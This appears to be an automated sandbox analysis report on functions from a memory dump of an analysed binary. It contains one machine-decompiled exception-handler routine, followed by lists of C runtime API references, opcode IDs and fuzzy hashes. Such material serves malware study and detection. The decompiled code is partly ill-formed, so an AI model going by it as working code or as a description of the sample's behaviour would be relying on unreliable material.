Function 6E162184, Relevance: .1, Instructions: 77
COMMONCrypto

Download Yara Rule

C-Code - Quality: 71%

			E6E162184(signed int* __eax, void* __ebx, signed int __edx, char _a4, long _a8, intOrPtr _a12) {
				intOrPtr _v8;
				char _v12;
				void* __ebp;
				signed int* _t43;
				char _t44;
				void* _t46;
				void* _t49;
				intOrPtr* _t53;
				void* _t54;
				void* _t65;
				long _t66;
				signed int* _t80;
				signed int* _t82;
				void* _t84;
				signed int _t86;
				void* _t89;
				void* _t95;
				void* _t96;
				void* _t99;
				void* _t106;

				_t43 = _t84;
				_t65 = __ebx + 2;
				 *_t43 =  *_t43 ^ __edx ^  *__eax;
				_t89 = _t95;
				_t96 = _t95 - 8;
				_push(_t65);
				_push(_t84);
				_push(_t89);
				asm("cld");
				_t66 = _a8;
				_t44 = _a4;
				if(( *(_t44 + 4) & 0x00000006) != 0) {
					_push(_t89);
					E6E1622EB(_t66 + 0x10, _t66, 0xffffffff);
					_t46 = 1;
				} else {
					_v12 = _t44;
					_v8 = _a12;
					 *((intOrPtr*)(_t66 - 4)) =  &_v12;
					_t86 =  *(_t66 + 0xc);
					_t80 =  *(_t66 + 8);
					_t49 = E6E1623A5(_t66);
					_t99 = _t96 + 4;
					if(_t49 == 0) {
						 *(_a4 + 4) =  *(_a4 + 4) | 0x00000008;
						goto L11;
					} else {
						while(_t86 != 0xffffffff) {
							_t53 =  *((intOrPtr*)(_t80 + 4 + (_t86 + _t86 * 2) * 4));
							if(_t53 == 0) {
								L8:
								_t80 =  *(_t66 + 8);
								_t86 = _t80[_t86 + _t86 * 2];
								continue;
							} else {
								_t54 =  *_t53();
								_t89 = _t89;
								_t86 = _t86;
								_t66 = _a8;
								_t55 = _t54;
								_t106 = _t54;
								if(_t106 == 0) {
									goto L8;
								} else {
									if(_t106 < 0) {
										_t46 = 0;
									} else {
										_t82 =  *(_t66 + 8);
										E6E162290(_t55, _t66);
										_t89 = _t66 + 0x10;
										E6E1622EB(_t89, _t66, 0);
										_t99 = _t99 + 0xc;
										E6E162387(_t82[2]);
										 *(_t66 + 0xc) =  *_t82;
										_t66 = 0;
										_t86 = 0;
										 *(_t82[2])(1);
										goto L8;
									}
								}
							}
							goto L13;
						}
						L11:
						_t46 = 1;
					}
				}
				L13:
				return _t46;
			}

0x6e162188
0x6e162189
0x6e16218a
0x6e16218d
0x6e16218f
0x6e162192
0x6e162193
0x6e162195
0x6e162196
0x6e162197
0x6e16219a
0x6e1621a4
0x6e162255
0x6e16225c
0x6e162265
0x6e1621aa
0x6e1621aa
0x6e1621b0
0x6e1621b6
0x6e1621b9
0x6e1621bc
0x6e1621c0
0x6e1621c5
0x6e1621ca
0x6e16224a
0x00000000
0x6e1621cc
0x6e1621cc
0x6e1621d8
0x6e1621da
0x6e162235
0x6e162235
0x6e16223b
0x00000000
0x6e1621dc
0x6e1621eb
0x6e1621ed
0x6e1621ee
0x6e1621ef
0x6e1621f2
0x6e1621f2
0x6e1621f4
0x00000000
0x6e1621f6
0x6e1621f6
0x6e162240
0x6e1621f8
0x6e1621f8
0x6e1621fc
0x6e162204
0x6e162209
0x6e16220e
0x6e16221a
0x6e162222
0x6e162229
0x6e16222f
0x6e162233
0x00000000
0x6e162233
0x6e1621f6
0x6e1621f4
0x00000000
0x6e1621da
0x6e16224e
0x6e16224e
0x6e16224e
0x6e1621ca
0x6e16226a
0x6e162271

Memory Dump Source

Source File: 00000000.00000002.590714125.000000006E161000.00000020.00020000.sdmp, Offset: 6E160000, based on PE: true

Associated: 00000000.00000002.590570797.000000006E160000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.590742972.000000006E163000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.590764017.000000006E165000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.590805088.000000006E166000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 12a7070065f657aa0aacf06b7ef6137888dfa06173cfdd6141a47a1bb7c7c469
Instruction ID: bb819fa263605217dcb95d7b310f93ba13c200297e43b75c13adfee3588c5614
Opcode Fuzzy Hash: 12a7070065f657aa0aacf06b7ef6137888dfa06173cfdd6141a47a1bb7c7c469
Instruction Fuzzy Hash: A721D6729002059FD700DFA8DC809A7B7B9FF49350B06846CDD199B245D730FA65D7E0

Uniqueness

Uniqueness Score: -1.00%

Function 6E22C073, Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.591194947.000000006E22B000.00000040.00020000.sdmp, Offset: 6E22B000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2473ecba5f78466b236b706d564a53f6938cb11cd03c01b5ec765ffc181c916c
Instruction ID: 5848e4e2bacbaff1beb30e80a96631e574802aeeebb804ac5897a495ab62ea82
Opcode Fuzzy Hash: 2473ecba5f78466b236b706d564a53f6938cb11cd03c01b5ec765ffc181c916c
Instruction Fuzzy Hash: D511B6773501059FD754CE99DC92E9673EBEB89730B298166ED08CF301E676E842C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 6E22C46C, Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.591194947.000000006E22B000.00000040.00020000.sdmp, Offset: 6E22B000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2c84f22b3cc78628e4c069225da77c858ff700800577a2065164e0eac194b3da
Instruction ID: 00372bd93f546511f958d1f513071a8302cf01b1783e9aa401204952f63c1aac
Opcode Fuzzy Hash: 2c84f22b3cc78628e4c069225da77c858ff700800577a2065164e0eac194b3da
Instruction Fuzzy Hash: 5701683775410A8FD708CFADD991D7BB7E5EBC1B31B05807EC5068B61AD634E505C620

Uniqueness

Uniqueness Score: -1.00%

Function 6E1D4CE0, Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.590837995.000000006E170000.00000020.00020000.sdmp, Offset: 6E170000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2180b883586aae41ac8781777cc862c242cc1a972c9a53dab4f618184f1a096c
Instruction ID: dc669299a185c0ad70d4d70e6e069535a94fed4029b819b811785e2d98686475
Opcode Fuzzy Hash: 2180b883586aae41ac8781777cc862c242cc1a972c9a53dab4f618184f1a096c
Instruction Fuzzy Hash: A811E5B9D0060CFFDB04DFD8D881B9DB7B5AB64304F2049A4D5156B385E370AB85DB81

Uniqueness

Uniqueness Score: -1.00%

Function 6E1D4D80, Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.590837995.000000006E170000.00000020.00020000.sdmp, Offset: 6E170000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e4a8f03c9b984449cb4292b44fcac2b7b99a73a0201d120360e42b6c73dc626d
Instruction ID: f159dcdbeb6749740f74ef44c33370319941724e55a9fcfdb458623d991ceb20
Opcode Fuzzy Hash: e4a8f03c9b984449cb4292b44fcac2b7b99a73a0201d120360e42b6c73dc626d
Instruction Fuzzy Hash: 0F1182B8D40208FFCB04DFE8D841BDDB7B9AB54304F2046A4D5156B385E774AB95DB81

Uniqueness

Uniqueness Score: -1.00%

Function 6E1A7960, Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.590837995.000000006E170000.00000020.00020000.sdmp, Offset: 6E170000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a8a8b6ecc5db9c1efa434a6914d392de8420ecd16dd435381bf1fb007753cdda
Instruction ID: d68e99554749a2fa5562a2fde66a45054e58287047f08bc12ba0dcb7b21cac85
Opcode Fuzzy Hash: a8a8b6ecc5db9c1efa434a6914d392de8420ecd16dd435381bf1fb007753cdda
Instruction Fuzzy Hash: E4E0EC2444D388A9CF2296ED40117FDBB7D4F93320F1400C7C581072C6C16B8B8AE352

Uniqueness

Uniqueness Score: -1.00%

Function 6E1D4E20, Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.590837995.000000006E170000.00000020.00020000.sdmp, Offset: 6E170000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b15bcadc8a72e62247d63694394c8d58c556b172c13d70b4330861a501b8be07
Instruction ID: 46f9ed90957fc8179a223026312ac059e4095c0114c7ee5a4c82f98ff456e909
Opcode Fuzzy Hash: b15bcadc8a72e62247d63694394c8d58c556b172c13d70b4330861a501b8be07
Instruction Fuzzy Hash: 46E048B6910248BBCB04CBD4E441A9AB37DEB84214F244658E80D47301D639EE55D691

Uniqueness

Uniqueness Score: -1.00%

Function 6E1A0FE0, Relevance: 86.1, APIs: 47, Strings: 2, Instructions: 399COMMON

Download Yara Rule

APIs

std::_Iterator_base::_Iterator_base.LIBCPMTD ref: 6E1A0FEC
Mailbox.LIBCMTD ref: 6E1A1044
DName::isEmpty.LIBCMTD ref: 6E1A1054
operator+.LIBVCRUNTIMED ref: 6E1A1081
Mailbox.LIBCMTD ref: 6E1A108D
operator+.LIBVCRUNTIMED ref: 6E1A10A7
Mailbox.LIBCMTD ref: 6E1A10B3
DName::operator+.LIBCMTD ref: 6E1A1169
Mailbox.LIBCMTD ref: 6E1A1172
UnDecorator::getDecoratedName.LIBVCRUNTIMED ref: 6E1A119B

Part of subcall function 6E19E050: UnDecorator::getDecoratedName.LIBVCRUNTIMED ref: 6E19E07B
Part of subcall function 6E19E050: Mailbox.LIBCMTD ref: 6E19E0C6

operator+.LIBVCRUNTIMED ref: 6E1A11AD

Part of subcall function 6E1997C0: DName::operator+.LIBCMTD ref: 6E1997E1

DName::operator+.LIBCMTD ref: 6E1A11C4

Part of subcall function 6E1998A0: Mailbox.LIBCMTD ref: 6E1998B0
Part of subcall function 6E1998A0: DName::operator+=.LIBCMTD ref: 6E1998BD
Part of subcall function 6E1998A0: Mailbox.LIBCMTD ref: 6E1998C9

Mailbox.LIBCMTD ref: 6E1A11E3
DName::operator+.LIBCMTD ref: 6E1A121E
Mailbox.LIBCMTD ref: 6E1A1227
DName::operator+.LIBCMTD ref: 6E1A1463
Mailbox.LIBCMTD ref: 6E1A146C
DName::operator+.LIBCMTD ref: 6E1A11DA

Part of subcall function 6E199860: Mailbox.LIBCMTD ref: 6E199870
Part of subcall function 6E199860: Mailbox.LIBCMTD ref: 6E199888

DName::isEmpty.LIBCMTD ref: 6E1A1492
DName::operator=.LIBVCRUNTIMED ref: 6E1A14A0
DName::DName.LIBVCRUNTIMED ref: 6E1A14C4
DName::operator+.LIBCMTD ref: 6E1A14DA
DName::operator+.LIBCMTD ref: 6E1A14F0
Mailbox.LIBCMTD ref: 6E1A14F9
DName::operator=.LIBVCRUNTIMED ref: 6E1A1507
Mailbox.LIBCMTD ref: 6E1A1513

Strings

@, xrefs: 6E1A1487
-, xrefs: 6E1A10F0

Memory Dump Source

Source File: 00000000.00000002.590837995.000000006E170000.00000020.00020000.sdmp, Offset: 6E170000, based on PE: false

Similarity

API ID: Mailbox$Name::operator+$Nameoperator+$DecoratedDecorator::getEmptyName::isName::operator=$Iterator_baseIterator_base::_Name::Name::operator+=std::_
String ID: -$@
API String ID: 625857421-1222683799
Opcode ID: 805b7531d707289e61c42f741f7e17834d619f9b7064a1123618dd89c75056a1
Instruction ID: 9f1cf9fb405c3f4fb23249d8ff771c2b24fbb36c36090db65691e3114a560737
Opcode Fuzzy Hash: 805b7531d707289e61c42f741f7e17834d619f9b7064a1123618dd89c75056a1
Instruction Fuzzy Hash: 66F166B5E00508DFDB05DFE4DCA0FFEB779AF55304F108569E216AA180EB705A88EB91

Uniqueness

Uniqueness Score: -1.00%

Function 6E19F080, Relevance: 75.6, APIs: 42, Strings: 1, Instructions: 391COMMON

Download Yara Rule

APIs

operator+.LIBVCRUNTIMED ref: 6E19F09F

Part of subcall function 6E1997F0: DName::DName.LIBVCRUNTIMED ref: 6E1997FD
Part of subcall function 6E1997F0: DName::operator+.LIBCMTD ref: 6E199810

DName::DName.LIBVCRUNTIMED ref: 6E19F0DD

Strings

), xrefs: 6E19F10C

Memory Dump Source

Source File: 00000000.00000002.590837995.000000006E170000.00000020.00020000.sdmp, Offset: 6E170000, based on PE: false

Similarity

API ID: NameName::$Name::operator+operator+
String ID: )
API String ID: 308612335-2427484129
Opcode ID: de4bd6fdd91937a16c781364d707f51ec3f350e614d7cf258eed9bd703cd42ff
Instruction ID: 2befd8281daaeb8e38eb9ab910cf7be6395094aa88cbc5949196a2eab14442f0
Opcode Fuzzy Hash: de4bd6fdd91937a16c781364d707f51ec3f350e614d7cf258eed9bd703cd42ff
Instruction Fuzzy Hash: 4CE142B5D00108FFDB04DBE4DCA5AEE7779AB55308F208565E525A7180EB30AB84FB91

Uniqueness

Uniqueness Score: -1.00%

Function 6E1971A0, Relevance: 59.9, APIs: 31, Strings: 3, Instructions: 427COMMON

Download Yara Rule

APIs

___vcrt_getptd.LIBVCRUNTIMED ref: 6E197242
___vcrt_getptd.LIBVCRUNTIMED ref: 6E197252
___vcrt_getptd.LIBVCRUNTIMED ref: 6E19725D
___vcrt_getptd.LIBVCRUNTIMED ref: 6E1972BA
___vcrt_getptd.LIBVCRUNTIMED ref: 6E1972C5
___vcrt_getptd.LIBVCRUNTIMED ref: 6E1972D0
_Smanip.LIBCPMTD ref: 6E197342

Part of subcall function 6E1AD290: IsProcessorFeaturePresent.KERNEL32(00000017,?,?,6E1CC799,?,?,6E1A5367,?), ref: 6E1AD2D2

Is_bad_exception_allowed.LIBVCRUNTIMED ref: 6E1972F9

Part of subcall function 6E198360: type_info::operator==.LIBVCRUNTIMED ref: 6E19839D

___DestructExceptionObject.LIBCMTD ref: 6E19730E
std::bad_alloc::bad_alloc.LIBCMTD ref: 6E19731C

Part of subcall function 6E195B50: RaiseException.KERNEL32(E06D7363,00000001,00000003,?), ref: 6E195BEA

__FrameHandler3::HandlerMap::iterator::operator++.LIBVCRUNTIMED ref: 6E1973CC
weak_ptr.LIBCPMTD ref: 6E197423
__FrameHandler3::HandlerMap::end.LIBVCRUNTIMED ref: 6E19742F
__FrameHandler3::HandlerMap::iterator::operator++.LIBVCRUNTIMED ref: 6E197439
Concurrency::details::HardwareAffinity::operator!=.LIBCMTD ref: 6E197445
CatchIt.LIBCMTD ref: 6E1974F3

Strings

csm, xrefs: 6E1971F4
csm, xrefs: 6E197275
csm, xrefs: 6E19734A

Memory Dump Source

Source File: 00000000.00000002.590837995.000000006E170000.00000020.00020000.sdmp, Offset: 6E170000, based on PE: false

Similarity

API ID: ___vcrt_getptd$FrameHandlerHandler3::$ExceptionMap::iterator::operator++$Affinity::operator!=CatchConcurrency::details::DestructFeatureHardwareIs_bad_exception_allowedMap::endObjectPresentProcessorRaiseSmanipstd::bad_alloc::bad_alloctype_info::operator==weak_ptr
String ID: csm$csm$csm
API String ID: 2369658663-393685449
Opcode ID: b8ecb7d849fe1bc6c82df064b4a58ce8c43c85d225f22ed9e1bc8dc7ef4d1a5b
Instruction ID: 29aa5a5ca77b1d1e0f21f7c9b57929c2d1488ecea0e9654aeffa56145fe8b55d
Opcode Fuzzy Hash: b8ecb7d849fe1bc6c82df064b4a58ce8c43c85d225f22ed9e1bc8dc7ef4d1a5b
Instruction Fuzzy Hash: 1BF1A1B5900209AFDB04CFE5C890AEE7779BF54348F50851AE9159B281DB30EAC5FBE1

Uniqueness

Uniqueness Score: -1.00%

Function 6E19F9C0, Relevance: 44.0, APIs: 24, Strings: 1, Instructions: 243COMMON

Download Yara Rule

APIs

std::_Iterator_base::_Iterator_base.LIBCPMTD ref: 6E19F9CC
std::_Iterator_base::_Iterator_base.LIBCPMTD ref: 6E19F9D4
DName::DName.LIBVCRUNTIMED ref: 6E19FA34
std::_Iterator_base::_Iterator_base.LIBCPMTD ref: 6E19FA44
operator+.LIBVCRUNTIMED ref: 6E19FA6E
DName::operator+=.LIBCMTD ref: 6E19FA94
DName::operator+=.LIBCMTD ref: 6E19FA9E
Mailbox.LIBCMTD ref: 6E19FAC2
DName::DName.LIBVCRUNTIMED ref: 6E19FC1D
DName::DName.LIBVCRUNTIMED ref: 6E1A02F5
DName::setIsUDC.LIBCMTD ref: 6E1A0308
DName::isEmpty.LIBCMTD ref: 6E1A0312
operator+.LIBVCRUNTIMED ref: 6E1A0348
Mailbox.LIBCMTD ref: 6E1A0354
Mailbox.LIBCMTD ref: 6E1A0360

Strings

_, xrefs: 6E19FA07

Memory Dump Source

Source File: 00000000.00000002.590837995.000000006E170000.00000020.00020000.sdmp, Offset: 6E170000, based on PE: false

Similarity

API ID: Iterator_baseIterator_base::_MailboxNameName::std::_$Name::operator+=operator+$EmptyName::isName::set
String ID: _
API String ID: 2065213285-701932520
Opcode ID: 0481bae16ebe332cbe7b875b8162f8c0f336026a82f90dee709d6d2081430156
Instruction ID: 19788875af26142bdfe2f0ff91b525ff607a275e92023ff87fb749200d440275
Opcode Fuzzy Hash: 0481bae16ebe332cbe7b875b8162f8c0f336026a82f90dee709d6d2081430156
Instruction Fuzzy Hash: 18A1A670900508DFCB09DFE8D8A4BED7B7ABF45304F004599E6159B294EB706AC5EF90

Uniqueness

Uniqueness Score: -1.00%

Function 6E1A04F0, Relevance: 35.3, APIs: 19, Strings: 1, Instructions: 276COMMON

Download Yara Rule

APIs

std::_Iterator_base::_Iterator_base.LIBCPMTD ref: 6E1A04F9
operator+.LIBVCRUNTIMED ref: 6E1A052E
DName::isEmpty.LIBCMTD ref: 6E1A0541
Mailbox.LIBCMTD ref: 6E1A0595
DName::setPtrRef.LIBCMTD ref: 6E1A05AC
char_traits.LIBCPMTD ref: 6E1A05BA
operator+.LIBVCRUNTIMED ref: 6E1A0601

Strings

B, xrefs: 6E1A0509

Memory Dump Source

Source File: 00000000.00000002.590837995.000000006E170000.00000020.00020000.sdmp, Offset: 6E170000, based on PE: false

Similarity

API ID: operator+$EmptyIterator_baseIterator_base::_MailboxName::isName::setchar_traitsstd::_
String ID: B
API String ID: 1073764026-1255198513
Opcode ID: f16f2cf5204342b996b09f492fad45049382ad71db0aff53902c6e8c9e9f8f77
Instruction ID: ba8fafd5ab94bcefb7c36ecb33276fcee95d9be2e66cbc7f176579477762440d
Opcode Fuzzy Hash: f16f2cf5204342b996b09f492fad45049382ad71db0aff53902c6e8c9e9f8f77
Instruction Fuzzy Hash: 0AB160B5D01508EFCB05DFE8D890AED77B9BF45344F048518FA199B281E7B1AA80EBD0

Uniqueness

Uniqueness Score: -1.00%

Function 6E1A3A40, Relevance: 35.2, APIs: 19, Strings: 1, Instructions: 243COMMON

Download Yara Rule

APIs

std::_Iterator_base::_Iterator_base.LIBCPMTD ref: 6E1A3A9B
Mailbox.LIBCMTD ref: 6E1A3AC0
DName::operator=.LIBVCRUNTIMED ref: 6E1A3B18
und_strncmp.LIBCMTD ref: 6E1A3B55
DName::getString.LIBCMTD ref: 6E1A3C1D
Mailbox.LIBCMTD ref: 6E1A3C70

Part of subcall function 6E199700: DName::DName.LIBVCRUNTIMED ref: 6E199718

Replicator::isFull.LIBCMTD ref: 6E1A3D42
Replicator::operator+=.LIBCMTD ref: 6E1A3D55
Mailbox.LIBCMTD ref: 6E1A3D61

Strings

@, xrefs: 6E1A3AE0

Memory Dump Source

Source File: 00000000.00000002.590837995.000000006E170000.00000020.00020000.sdmp, Offset: 6E170000, based on PE: false

Similarity

API ID: Mailbox$FullIterator_baseIterator_base::_NameName::Name::getName::operator=Replicator::isReplicator::operator+=Stringstd::_und_strncmp
String ID: @
API String ID: 3194277874-2766056989
Opcode ID: 6b99eb2d7b4b8e20f4d7cf8ceb32b1c9b2222da4bac718d479c961559b570ca9
Instruction ID: 2c27ae94ff3160cf48081ec8605051b091b826f7be725ed9d88ec495aeb482b0
Opcode Fuzzy Hash: 6b99eb2d7b4b8e20f4d7cf8ceb32b1c9b2222da4bac718d479c961559b570ca9
Instruction Fuzzy Hash: 04A1A275D01608DFCB05DFE8DC94BEEBBBABF05304F104529E615AB284DB706985EBA0

Uniqueness

Uniqueness Score: -1.00%

Function 6E1E5F20, Relevance: 34.8, APIs: 23, Instructions: 321timememoryCOMMON

Download Yara Rule

APIs

__wcstombs_l.LIBCMTD ref: 6E1E5FE3
__MarkAllocaS.LIBCMTD ref: 6E1E5FEC
std::_Timevec::_Timevec.LIBCPMTD ref: 6E1E6007
std::_Timevec::_Timevec.LIBCPMTD ref: 6E1E6012
std::_Mutex::_Lock.LIBCPMTD ref: 6E1E6030

Part of subcall function 6E1D81B0: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,?,?,?,?,00000000,00000000), ref: 6E1D81E3

std::_Mutex::_Lock.LIBCPMTD ref: 6E1E606D
std::_Mutex::_Lock.LIBCPMTD ref: 6E1E60B0

Memory Dump Source

Source File: 00000000.00000002.590837995.000000006E170000.00000020.00020000.sdmp, Offset: 6E170000, based on PE: false

Similarity

API ID: std::_$LockMutex::_$TimevecTimevec::_$AllocaByteCharMarkMultiWide__wcstombs_l
String ID:
API String ID: 3719586419-0
Opcode ID: 61e4fad9b4da91dd92b1737a0c35723a99b0c22b435f104a1314ae79787ca1e9
Instruction ID: 30952caf85dff8093e349d8c9826534a1040f62f404f0e05ff5ab3643727125c
Opcode Fuzzy Hash: 61e4fad9b4da91dd92b1737a0c35723a99b0c22b435f104a1314ae79787ca1e9
Instruction Fuzzy Hash: 95C10AB591050DEFDB04DFD8D890FEEB7B9AB54308F104558F611AB680EB70AE85EB90

Uniqueness

Uniqueness Score: -1.00%

Function 6E19C550, Relevance: 33.2, APIs: 22, Instructions: 210COMMON

Download Yara Rule

APIs

DName::operator+.LIBCMTD ref: 6E19C59A
DName::operator+.LIBCMTD ref: 6E19C5AB
DName::isEmpty.LIBCMTD ref: 6E19C718
operator+.LIBVCRUNTIMED ref: 6E19C743
DName::operator+.LIBCMTD ref: 6E19C75C
DName::operator+.LIBCMTD ref: 6E19C770
DName::operator+.LIBCMTD ref: 6E19C784

Memory Dump Source

Source File: 00000000.00000002.590837995.000000006E170000.00000020.00020000.sdmp, Offset: 6E170000, based on PE: false

Similarity

API ID: Name::operator+$EmptyName::isoperator+
String ID:
API String ID: 2054230242-0
Opcode ID: cd16f79d5ea07f61cea09a5c0d968dc69b397a0e6eb1a7e446529138ac45e0e1
Instruction ID: 6c4d39262dba080a5151a08a9c90bdf8bed1597c9c9185d10f6ed1fa66a8dc58
Opcode Fuzzy Hash: cd16f79d5ea07f61cea09a5c0d968dc69b397a0e6eb1a7e446529138ac45e0e1
Instruction Fuzzy Hash: CC813E75D10108AFDB04DFE4DCA0FEEB7B9AF54304F508569E519AB290EB306A84EF91

Uniqueness

Uniqueness Score: -1.00%

Function 6E19C8E0, Relevance: 30.3, APIs: 20, Instructions: 327COMMON

Download Yara Rule

APIs

std::_Iterator_base::_Iterator_base.LIBCPMTD ref: 6E19C927
Mailbox.LIBCMTD ref: 6E19CDD4
DName::isEmpty.LIBCMTD ref: 6E19CDDC
Mailbox.LIBCMTD ref: 6E19CDEC
operator+.LIBVCRUNTIMED ref: 6E19CE5B
Mailbox.LIBCMTD ref: 6E19CE67
operator+.LIBVCRUNTIMED ref: 6E19CE9E
Mailbox.LIBCMTD ref: 6E19CEAA
operator+.LIBVCRUNTIMED ref: 6E19CF05
Mailbox.LIBCMTD ref: 6E19CF11
DName::isEmpty.LIBCMTD ref: 6E19CF19
operator+.LIBVCRUNTIMED ref: 6E19CF2F
Mailbox.LIBCMTD ref: 6E19CF47
operator+.LIBVCRUNTIMED ref: 6E19D0A6

Memory Dump Source

Source File: 00000000.00000002.590837995.000000006E170000.00000020.00020000.sdmp, Offset: 6E170000, based on PE: false

Similarity

API ID: Mailbox$operator+$EmptyName::is$Iterator_baseIterator_base::_std::_
String ID:
API String ID: 2623725463-0
Opcode ID: acce299e12a9ee56037719ad3f15edc1905d27fdb829934ff78f21c06b085f6e
Instruction ID: 6ea956001dd8c4438e322ab0f9fe91d3a6445a5a12bd8a29d6f1ce42bbe788ee
Opcode Fuzzy Hash: acce299e12a9ee56037719ad3f15edc1905d27fdb829934ff78f21c06b085f6e
Instruction Fuzzy Hash: 85D14EB5C00109AFCB15DFE4DC60AEDBBB8BF55304F0445AAE5197B284EB305685EF91

Uniqueness

Uniqueness Score: -1.00%

Function 6E19EBE0, Relevance: 28.2, APIs: 15, Strings: 1, Instructions: 167COMMON

Download Yara Rule

APIs

std::_Iterator_base::_Iterator_base.LIBCPMTD ref: 6E19EBE9
DName::DName.LIBVCRUNTIMED ref: 6E19EC72
DName::DName.LIBVCRUNTIMED ref: 6E19ECED
DName::DName.LIBVCRUNTIMED ref: 6E19ED05
DName::DName.LIBVCRUNTIMED ref: 6E19ED6C

Part of subcall function 6E1992D0: __aullrem.LIBCMT ref: 6E199317
Part of subcall function 6E1992D0: __aulldiv.LIBCMT ref: 6E199330

DName::operator+.LIBCMTD ref: 6E19ED79

Part of subcall function 6E199860: Mailbox.LIBCMTD ref: 6E199870
Part of subcall function 6E199860: Mailbox.LIBCMTD ref: 6E199888

Mailbox.LIBCMTD ref: 6E19ED82
DName::operator+.LIBCMTD ref: 6E19ED90
Mailbox.LIBCMTD ref: 6E19ED99
DName::operator+.LIBCMTD ref: 6E19EDC4

Part of subcall function 6E1998A0: Mailbox.LIBCMTD ref: 6E1998B0
Part of subcall function 6E1998A0: DName::operator+=.LIBCMTD ref: 6E1998BD
Part of subcall function 6E1998A0: Mailbox.LIBCMTD ref: 6E1998C9

Mailbox.LIBCMTD ref: 6E19EDCD
DName::operator+=.LIBCMTD ref: 6E19EDF5

Part of subcall function 6E199C00: DName::isValid.LIBCMTD ref: 6E199C0A
Part of subcall function 6E199C00: DName::isEmpty.LIBCMTD ref: 6E199C16
Part of subcall function 6E199C00: DName::operator=.LIBVCRUNTIMED ref: 6E199C32

DName::setIsComArray.LIBCMTD ref: 6E19EDFD
Mailbox.LIBCMTD ref: 6E19EE09
std::_Iterator_base::_Iterator_base.LIBCPMTD ref: 6E19EE16

Strings

C, xrefs: 6E19EC12

Memory Dump Source

Source File: 00000000.00000002.590837995.000000006E170000.00000020.00020000.sdmp, Offset: 6E170000, based on PE: false

Similarity

API ID: Mailbox$NameName::$Name::operator+$Iterator_baseIterator_base::_Name::isName::operator+=std::_$ArrayEmptyName::operator=Name::setValid__aulldiv__aullrem
String ID: C
API String ID: 961569035-1037565863
Opcode ID: 891d95f04f7bfbe91708c0816c5cb8ca3c673aa5ce894658106f46858b7ba042
Instruction ID: cae4965adbf19adf240c38d2801e62ebd67feb4cbc45cf14374c2780a9e1b164
Opcode Fuzzy Hash: 891d95f04f7bfbe91708c0816c5cb8ca3c673aa5ce894658106f46858b7ba042
Instruction Fuzzy Hash: 1F61BF30505945DFDB09DFA4C8A4BEE77B6FB42304F1446A9E5625B2D0CBB1AAC0FB90

Uniqueness

Uniqueness Score: -1.00%

Function 6E1A3840, Relevance: 25.7, APIs: 17, Instructions: 154COMMON

Download Yara Rule

APIs

Mailbox.LIBCMTD ref: 6E1A384D
DName::isValid.LIBCMTD ref: 6E1A3855
DName::operator+.LIBCMTD ref: 6E1A388B

Part of subcall function 6E1998A0: Mailbox.LIBCMTD ref: 6E1998B0
Part of subcall function 6E1998A0: DName::operator+=.LIBCMTD ref: 6E1998BD
Part of subcall function 6E1998A0: Mailbox.LIBCMTD ref: 6E1998C9

DName::operator+.LIBCMTD ref: 6E1A389E

Part of subcall function 6E199860: Mailbox.LIBCMTD ref: 6E199870
Part of subcall function 6E199860: Mailbox.LIBCMTD ref: 6E199888

Mailbox.LIBCMTD ref: 6E1A38A7
DName::isValid.LIBCMTD ref: 6E1A38AF

Part of subcall function 6E199990: DName::isValid.LIBCMTD ref: 6E19999C
Part of subcall function 6E199990: DName::isEmpty.LIBCMTD ref: 6E1999B1

DName::isValid.LIBCMTD ref: 6E1A38F2
operator+.LIBVCRUNTIMED ref: 6E1A3934

Part of subcall function 6E1997C0: DName::operator+.LIBCMTD ref: 6E1997E1

DName::operator+.LIBCMTD ref: 6E1A3948

Part of subcall function 6E199A30: DName::isValid.LIBCMTD ref: 6E199A3C
Part of subcall function 6E199A30: DName::isEmpty.LIBCMTD ref: 6E199A48
Part of subcall function 6E199A30: DName::isEmpty.LIBCMTD ref: 6E199A54
Part of subcall function 6E199A30: DName::operator=.LIBVCRUNTIMED ref: 6E199A69

DName::isValid.LIBCMTD ref: 6E1A3976
DName::isValid.LIBCMTD ref: 6E1A39B6
DName::operator+=.LIBCMTD ref: 6E1A39D1
DName::operator+=.LIBCMTD ref: 6E1A39DB

Part of subcall function 6E1A0FE0: std::_Iterator_base::_Iterator_base.LIBCPMTD ref: 6E1A0FEC
Part of subcall function 6E1A0FE0: Mailbox.LIBCMTD ref: 6E1A1044

DName::isValid.LIBCMTD ref: 6E1A3A00
operator+.LIBVCRUNTIMED ref: 6E1A3A13
Mailbox.LIBCMTD ref: 6E1A3A1F
Mailbox.LIBCMTD ref: 6E1A3A2B

Memory Dump Source

Source File: 00000000.00000002.590837995.000000006E170000.00000020.00020000.sdmp, Offset: 6E170000, based on PE: false

Similarity

API ID: Name::is$Mailbox$Valid$Name::operator+$EmptyName::operator+=$operator+$Iterator_baseIterator_base::_Name::operator=std::_
String ID:
API String ID: 1123558639-0
Opcode ID: 707682e9d33f6de8a782e3454fb6d240fcba8a8ac46630f263a49c38238b8320
Instruction ID: 4204129cc7aa68b3c301fd4d8ce0b58b6fb41c15fca020061d998b3269f9aab1
Opcode Fuzzy Hash: 707682e9d33f6de8a782e3454fb6d240fcba8a8ac46630f263a49c38238b8320
Instruction Fuzzy Hash: 4251F675D1050A9FDB04DFE4C9A5AFE77BDAF11304F204169E623A61C0EB306E85EBA1

Uniqueness

Uniqueness Score: -1.00%

